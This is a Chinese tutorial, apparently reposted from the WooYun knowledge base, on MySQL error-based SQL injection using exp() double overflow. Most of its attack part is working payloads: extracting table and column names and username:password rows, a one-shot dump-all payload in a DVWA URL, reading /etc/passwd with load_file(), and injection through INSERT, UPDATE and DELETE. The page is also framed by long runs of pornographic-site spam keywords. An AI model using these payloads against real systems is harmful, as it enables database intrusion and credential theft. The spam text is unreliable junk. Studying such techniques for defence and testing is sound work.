精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

使用exp進行SQL報錯注入

安全 數據安全
好消息好消息~作者又在MySQL中發現了一個Double型數據溢出。

0x01 前言概述

好消息好消息~作者又在MySQL中發現了一個Double型數據溢出。如果你想了解利用溢出來注出數據,你可以讀一下作者之前發的博文:BIGINT Overflow Error based injections,drops上面也有對應翻譯,具體見這里。當我們拿到MySQL里的函數時,作者比較感興趣的是其中的數學函數,它們也應該包含一些數據類型來保存數值。所以作者就跑去測試看哪些函數會出現溢出錯誤。然后作者發現,當傳遞一個大于709的值時,函數exp()就會引起一個溢出錯誤。

使用exp進行SQL報錯注入

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

在MySQL中,exp與ln和log的功能相反,簡單介紹下,就是log和ln都返回以e為底數的對數,見等式:

 

 

enter image description here

 

 

 

enter image description here

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)


mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

 

指數函數為對數函數的反函數,exp()即為以e為底的對數函數,如等式:

 

enter image description here

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                    15 |
+-----------------------+
1 row in set (0.00 sec)

 

0x02 注入

當涉及到注入時,我們使用否定查詢來造成“DOUBLE value is out of range”的錯誤。作者之前的博文提到的,將0按位取反就會返回“18446744073709551615”,再加上函數成功執行后返回0的緣故,我們將成功執行的函數取反就會得到***的無符號BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)


mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

我們通過子查詢與按位求反,造成一個DOUBLE overflow error,并借由此注出數據。

  1. >`exp(~(select*from(select user())x))`  
  2.  
  3.     mysql> select exp(~(select*from(select user())x));  
  4.     ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x03 注出數據

得到表名:

 

  1. select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)); 

 

得到列名:

 

  1. select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)); 

 

檢索數據:

 

  1. select exp(~ (select*from(select concat_ws(':',id, username, passwordfrom users limit 0,1)x)); 

 

0x04 一蹴而就

這個查詢可以從當前的上下文中dump出所有的tables與columns。我們也可以dump出所有的數據庫,但由于我們是通過一個錯誤進行提取,它會返回很少的結果。

  1. exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))  
  2.  
  3. http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit# 

 

enter image description here

 

0x05 讀取文件

你可以通過load_file()函數來讀取文件,但作者發現有13行的限制,該語句也可以在BIGINT overflow injections中使用。

  1. select exp(~(select*from(select load_file('/etc/passwd'))a));  
  2.  

 

enter image description here

 

注意,你無法寫文件,因為這個錯入寫入的只是0。

  1. mysql> select exp(~(select*from(select 'hello')a)) into outfile 'C:/out.txt';  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'hello' from dual)))'      
  3.  
  4. # type C:\out.txt  

0x06 Injection in Insert

按部就班就好

  1. mysql> insert into users (id, username, passwordvalues (2, '' ^ exp(~(select*from(select user())x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

對于所有的insert,update和delete語句DIOS查詢也同樣可以使用。

  1. mysql> insert into users (id, username, passwordvalues (2, '' | exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)), 'Eyre');  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '000  
  3. newdb::users::id  
  4. newdb::users::username  
  5. newdb::users::password' from dual)))' 

0x07 Injection in Update

  1. mysql> update users set password='Peter' ^ exp(~(select*from(select user())x)) where id=4;  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

0x08 Injection in Delete

  1. mysql> delete from users where id='1' | exp(~(select*from(select user())x));  
  2. ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))' 

和前面的BIGINT注入一樣,exp注入也適用于MySQL5.5.5及以上版本。以前的版本對于此情況則是“一言不發”。

  1. mysql> select version();  
  2. +---------------------+  
  3. | version()           |  
  4. +---------------------+  
  5. | 5.0.45-community-nt |  
  6. +---------------------+  
  7. 1 row in set (0.00 sec)   
  8.  
  9.  
  10. mysql> select exp(710);  
  11. +----------+  
  12. | exp(710) |  
  13. +----------+  
  14. |   1.#INF |  
  15. +----------+  
  16. 1 row in set (0.00 sec)   
  17.  
  18.  
  19. mysql> select exp(~0);  
  20. +---------+  
  21. | exp(~0) |  
  22. +---------+  
  23. |  1.#INF |  
  24. +---------+  
  25. 1 row in set (0.00 sec) 

可能還有其他的函數會產生這種報錯呦。(有待你發現啦:)

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2010-12-14 11:30:11

2010-03-29 16:16:59

Oracle exp備

2010-12-20 16:04:30

2009-03-10 08:05:19

2013-11-07 09:31:22

2024-05-06 13:34:28

WireGoogleGo

2017-08-10 10:23:59

2021-05-09 22:48:40

SQL數據庫變量

2024-08-19 08:16:57

@Resource@AutowiredSpring

2010-04-13 14:35:17

2009-09-27 09:39:19

2019-07-05 08:12:36

SQLMAPsql注入

2013-05-02 15:09:22

2020-10-26 07:04:29

SQL注入mysql

2023-07-13 11:24:14

SQL優化賦值

2021-08-09 15:00:36

SQL數據庫

2010-09-17 13:40:43

SQL更新

2019-10-17 09:25:56

Spark StreaPVUV

2009-04-16 17:44:46

性能優化擴展高性能

2023-10-18 18:31:04

SQL查詢數據
點贊
收藏

51CTO技術棧公眾號

久久麻豆视频| 国产成人精品毛片| 国产一区不卡| 欧美日韩免费观看一区二区三区| 成年人黄色在线观看| 性生活视频软件| 美日韩精品视频| 久久视频在线观看免费| 成人在线视频免费播放| 国产精品久久亚洲不卡| 亚洲精品第一国产综合野| 久久婷婷国产综合尤物精品| av大片在线免费观看| 欧美激情偷拍自拍| 日韩av一区在线| 午夜免费福利视频在线观看| 韩国日本一区| 中文字幕精品一区二区精品绿巨人| 亚洲自拍偷拍一区| 亚洲图片欧美日韩| 国产综合色产| 日韩在线视频二区| 给我看免费高清在线观看| www.久久99| 日本道免费精品一区二区三区| 永久免费网站视频在线观看| 成人在线视频成人| av高清不卡在线| 97久久天天综合色天天综合色hd| 成人免费视频国产免费| 国产一区二区三区久久| 天天操综合网| 亚洲成人久久影院| 五月天av影院| 高清毛片在线看| 91天堂素人约啪| 成人一区二区在线| 一区二区三区精彩视频| 日韩中文字幕av电影| 57pao成人国产永久免费| 久久亚洲成人av| 亚洲免费二区| 日韩视频在线观看免费| 久久av无码精品人妻系列试探| 精品国产导航| 精品国精品国产尤物美女| 欧美激情第一区| 婷婷成人av| 欧美人与性动xxxx| 污版视频在线观看| 精品三区视频| 欧美色综合影院| caoporn超碰97| 香蕉成人影院| 欧美无砖专区一中文字| 亚洲免费av一区二区三区| 性感美女一区二区在线观看| 一本一本久久a久久精品综合麻豆| 少妇高潮毛片色欲ava片| 538视频在线| 欧美喷水视频| 2023国产精品自拍| 成人91免费视频| 精品人妻午夜一区二区三区四区| 久久国产精品99久久人人澡| 国产精品吴梦梦| 一区二区自拍偷拍| 久久99国产精品久久| 成人黄色av网| 国产黄色一区二区| 国产成人精品三级| 国产精品一区在线观看| 成人小说亚洲一区二区三区| 成人性生交大片免费看中文网站| 国产a一区二区| 日本精品一区二区在线观看| 99视频热这里只有精品免费| 久久久久久久久四区三区| 日韩亚洲视频在线观看| 国产精品私人影院| 中文字幕一区二区三区精彩视频| av毛片在线播放| 亚洲国产日韩a在线播放| 男人用嘴添女人下身免费视频| 久久青草伊人| 欧美性感一类影片在线播放| 青青草精品视频在线观看| 久久久久久久久久久久电影| 亚洲成人av在线| 国产熟妇久久777777| 99久久.com| 午夜欧美大片免费观看| 亚洲国产成人精品女人久久| 韩国av一区二区三区在线观看| 国产98在线|日韩| 成人免费高清在线播放| 亚洲美女免费视频| 国产日韩一区二区在线观看| 9.1麻豆精品| 日韩av在线影院| 小向美奈子av| 国产日韩欧美| 91亚洲精品久久久| 免费在线毛片| 一区二区三区欧美在线观看| 免费黄色一级网站| 成人直播在线观看| 色久欧美在线视频观看| 国产精品18p| 久久69国产一区二区蜜臀| 好吊色欧美一区二区三区| 亚洲麻豆精品| 狠狠色噜噜狠狠狠狠97| 亚洲色图欧美自拍| 国产亚洲欧美日韩在线观看一区二区| 久久午夜a级毛片| 无码一区二区三区| av影院午夜一区| 精品嫩模一区二区三区| yy6080久久伦理一区二区| 亚洲激情视频网站| wwwav国产| 日韩精品乱码av一区二区| 国产精品美女诱惑| 国产在线更新| 欧美三级三级三级| 中文字幕日韩三级片| 国产精品v欧美精品v日本精品动漫| 国产精品自拍偷拍| 九一国产在线| 激情久久av一区av二区av三区 | 夜夜嗨一区二区| 亚洲精品欧美日韩专区| 在线免费看黄网站| 欧美在线综合视频| 在线免费看黄视频| 国产亚洲午夜| 精品麻豆av| 国产污视频在线播放| 精品国产青草久久久久福利| 青青草原免费观看| 国产精品自拍三区| 欧美三级午夜理伦三级老人| 在线观看欧美| 成人97在线观看视频| 国产精品欧美激情在线| 国产精品免费av| 亚洲最大天堂网| 日韩精品网站| 国产日韩中文在线| 暖暖日本在线观看| 欧美丰满少妇xxxbbb| 欧美性x x x| 狠狠v欧美v日韩v亚洲ⅴ| 杨幂一区欧美专区| 国产精品亚洲欧美一级在线| 久久综合伊人77777| 国产草草影院ccyycom| 亚洲男人电影天堂| 亚洲精品成人无码毛片| 黄色在线一区| 国产精品国产三级国产专区53| 69av成人| 亚洲网在线观看| 中文字幕人妻色偷偷久久| 国产精品免费观看视频| 成人av毛片在线观看| 欧美久久视频| 国模精品一区二区三区| 欧美片第一页| 日韩色av导航| 亚洲精品无amm毛片| 欧美日韩国产一中文字不卡| 波多野结衣片子| 久久99久久99小草精品免视看| 91视频成人免费| 久久porn| 国产精品永久免费在线| 在线午夜影院| 亚洲精品自拍视频| 伊人网中文字幕| 亚洲一区二区三区国产| 一区二区三区免费在线观看视频| 日韩成人精品在线| 第九区2中文字幕| 免费短视频成人日韩| 国产欧美精品一区二区三区-老狼 国产欧美精品一区二区三区介绍 国产欧美精品一区二区 | 色综合激情久久| 国产真人做爰视频免费| 久久 天天综合| 真人抽搐一进一出视频| 国产精品一区二区99| 91九色单男在线观看| 电影在线观看一区| www.久久久久久.com| 全部免费毛片在线播放一个| 欧美性猛交xxxx乱大交退制版| 黄色一级视频免费观看| 久久久久成人黄色影片| 亚洲午夜精品一区| 亚洲毛片视频| 欧美日韩一区二区三区电影| 青青草久久爱| 2019国产精品视频| 吞精囗交69激情欧美| 欧美成人午夜视频| 黄色毛片在线观看| 欧美变态tickle挠乳网站| 在线观看亚洲黄色| 亚洲国产欧美一区二区三区丁香婷| 久久久久无码精品国产sm果冻| 粉嫩av一区二区三区| 美女网站色免费| 国产精品日本欧美一区二区三区| 99久re热视频精品98| 欧美丝袜激情| 欧美凹凸一区二区三区视频| 精品视频在线播放一区二区三区| 国产成人aa精品一区在线播放| 性欧美1819sex性高清大胸| 在线看日韩欧美| 你懂的视频在线| 亚洲国产成人av在线| 国产美女www爽爽爽视频| 91久久线看在观草草青青| 日韩三级av在线| 亚洲影视在线观看| 四虎永久免费在线| 中国色在线观看另类| 日韩一级视频在线观看| 成人午夜免费av| 特种兵之深入敌后| 韩国av一区二区三区在线观看| 无限资源日本好片| 日韩国产欧美视频| 欧在线一二三四区| 乱码第一页成人| 国产最新免费视频| 99精品视频免费| www.99热这里只有精品| 亚洲理伦在线| 水蜜桃色314在线观看| 激情一区二区| 日韩av在线播放不卡| 亚洲小说区图片区| 国产在线xxxx| 伊人精品成人久久综合软件| 欧美一区二区视频在线播放| 欧美三级不卡| 日韩视频免费播放| 99成人免费视频| 国产成人无码a区在线观看视频| 亚洲理论在线| 99久久久无码国产精品6| 乱人伦精品视频在线观看| 欧美黄色一级片视频| 日韩福利电影在线| 欧美自拍小视频| 麻豆国产欧美一区二区三区| 久热精品在线播放| 国产在线视频精品一区| 亚洲天堂网站在线| 国产传媒久久文化传媒| 久久人妻少妇嫩草av蜜桃| 不卡在线观看av| 狠狠人妻久久久久久综合蜜桃| 久久综合中文字幕| av免费播放网站| 亚洲欧美日韩一区二区三区在线观看| 翔田千里88av中文字幕| 亚洲一区免费在线观看| 日本熟妇色xxxxx日本免费看| 一本久久综合亚洲鲁鲁五月天| 久久久久久久久久一级| 91精品国产高清一区二区三区蜜臀| 国产成人av免费看| 日韩成人中文电影| avtt亚洲| 欧美黑人巨大精品一区二区| 麻豆视频在线观看免费网站黄| 国产精品第七影院| 国产日韩一区二区三免费高清 | 香蕉一区二区| 手机在线观看国产精品| 中文字幕亚洲精品乱码| 国内外成人免费激情视频| 蜜桃免费网站一区二区三区| 韩国三级在线看| 国产欧美精品一区二区色综合| 四虎精品免费视频| 欧美日韩国内自拍| 91精品国产乱码久久| 亚洲国产成人精品女人久久久 | 人人爽人人av| 国产美女av一区二区三区| 大地资源二中文在线影视观看 | 亚洲天天在线日亚洲洲精| 国产原创视频在线观看| 欧亚精品中文字幕| 日韩在线成人| 亚洲成人精品电影在线观看| 国产综合视频| 中国黄色片一级| 久久久久久久久久久久久女国产乱 | 亚洲少妇第一页| 成年人午夜久久久| 最新av电影网站| 色呦呦网站一区| www.色日本| 色天天综合狠狠色| 末成年女av片一区二区下载| 亚洲xxxxx性| 日韩欧美大片| 97成人在线观看视频| 国产精品1024久久| 人人艹在线视频| 色一情一乱一乱一91av| 欧洲成人一区二区三区| 久久亚洲精品成人| 99久久久国产精品免费调教网站| 国产日韩欧美综合精品| 欧美二区不卡| 成人综合久久网| 国产欧美视频在线观看| 国产www在线| 亚洲韩国日本中文字幕| 丝袜在线视频| 亚洲在线免费看| 91精品国产麻豆国产在线观看| 国产野外作爱视频播放| 97久久久精品综合88久久| www.99re7.com| 日韩精品一区国产麻豆| 黄色成人在线| 成人免费网站在线看| 日韩a一区二区| 成年人在线观看视频免费| 国产亚洲精品免费| 无码人妻丰满熟妇精品| 亚洲精品一区二区三区婷婷月| a级片在线免费观看| 国产伦视频一区二区三区| 欧美色图首页| 久久久久久久人妻无码中文字幕爆| 亚洲人成影院在线观看| 99在线观看精品视频| 久久久www成人免费精品| 91麻豆精品| 樱空桃在线播放| 国产成人一区二区精品非洲| 欧美日韩一级在线观看| 欧美电影免费观看完整版| 丰满的护士2在线观看高清| 国产精品日韩欧美一区二区| 一本久久知道综合久久| 亚洲蜜桃精久久久久久久久久久久| 黑人巨大精品欧美一区二区一视频| 五月激情婷婷综合| 国产不卡在线观看| 日韩系列欧美系列| 亚洲欧洲日韩在线| 国产精品免费无遮挡无码永久视频| 精品亚洲一区二区三区四区五区| 久久人体大尺度| 日产国产精品精品a∨| 老司机午夜精品99久久| 欧美一级特黄高清视频| 日韩亚洲欧美高清| av白虎一区| 欧美精品一区三区在线观看| 日韩不卡一区二区三区| chinese全程对白| 精品日韩av一区二区| 校园春色亚洲| 亚洲一卡二卡三卡| 国产福利一区二区三区视频| 国产成人无码精品| 在线精品视频视频中文字幕| 久久一级大片| aa在线免费观看| 中文字幕一区在线观看| 亚洲欧美另类日韩| 国产成人精品久久二区二区| 国产精品黑丝在线播放| 逼特逼视频在线观看| 色成年激情久久综合| av软件在线观看| 免费在线成人av| 国产一区二区三区不卡在线观看| 日韩三级视频在线播放| 中文字幕无线精品亚洲乱码一区| 久久天堂久久| 国产一级片黄色| 一区二区三区自拍| 欧美伦理影视网| 91亚洲精品丁香在线观看| 国产精品五区| 欧美日韩在线视频免费播放| 亚洲欧美日韩中文在线制服| 美女精品视频在线|